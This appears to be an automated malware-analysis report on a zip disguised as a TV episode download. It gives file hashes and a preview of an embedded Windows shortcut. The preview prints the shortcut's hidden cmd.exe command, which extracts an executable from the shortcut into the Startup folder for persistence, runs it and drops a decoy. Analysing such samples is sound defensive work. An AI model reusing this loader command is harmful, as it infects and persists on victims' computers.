            Preview:L..................F........................................................)....P.O. .:i.....+00.../C:\...................R.1...........Windows.<..............*.........................W.i.n.d.o.w.s.....V.1...........System32..>..............*.........................S.y.s.t.e.m.3.2.....R.2......... .cmd.EXE.<..............*.........................c.m.d...E.X.E........./.v.:.O.n./.c.S.e.t. .l.=.F.r.o.m...S.0.3.E.0.6...1.0.8.0.p...W.E.B...H.2.6.4.-.S.u.c.c.e.s.s.f.u.l.C.r.a.b...m.k.v.&.S.e.t. .J.=.".%.A.p.p.D.a.t.a.%.\.m.i.c.r.o.s.o.f.t.\.w.i.n.d.o.w.s.\.S.t.a.r.t. .M.e.n.u.\.p.r.o.g.r.a.m.s.\.S.t.a.r.t.u.p.\.%.U.s.e.r.n.a.m.e.%...e.x.e.".&.(.i.f. .n.o.t. .e.x.i.s.t. .!.J.!. .F.I.N.D.S.T.R./.v. .".c.m.d...E.X.E. .h.I.T.%.t.i.m.e.:.~.7.,.1.%.%.t.i.m.e.:.~.-.2.%.". .!.l.!...L.n.k.>.!.J.!.&.S.T.A.R.T. .".". .!.J.!.).&.c.d. .%.t.m.p.%.&.E.C.H.O...>.!.l.!.&.S.T.A.R.T. .!.l.!./...\.F.r.o.m...S.0.3.E.0.6...1.0.8.0.p...W.E.B...H.2.6.4.-.S.u.c.c.e.s.s.f.u.l.C.r.a.b...m.k.v.........%comspec%
            File type:Zip archive data, at least v2.0 to extract, compression method=store
            Entropy (8bit):7.390738309835246
            TrID:
            • ZIP compressed archive (8000/1) 99.91%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
            File name:From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.zip
            File size:7'132'534 bytes
            MD5:1f0fff5348e8f86f438769cbd12d9c56
            SHA1:1fbd2ae60bb3bd9b837202619fadde65025ffade
            SHA256:bdf77d739ca9afd5d9d00501ccb3eaa1a5fa9be9cf932d2452e3fbcc15c170e8
            SHA512:9d4e5abed347fc841552ee7fedf1b604f9a56fc2cbd62ae8a31611993c12d46a39cdcbd633768ce291b648fe6f1020cc59dc7903f91cd65c220bc5ec7059e297
            SSDEEP:196608:NsP+vhtozOQ2m2peo87PBXgJdHWJoLF68:MjCQ2Jwo87+NWIF68
            TLSH:CA760129F85A3662E84DCAF405F02EF003F4AD3412BB67C42275755F9A67E7E8B60934
            File Content Preview:PK........akXY................From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv/PK.........iXY;.g.f.l..Q{A_...From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv/From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.lnk.].x.....<......UK.P....Z%.m.60.........4~.....Z...e:.
            Icon Hash:1c1c1e4e4ececedc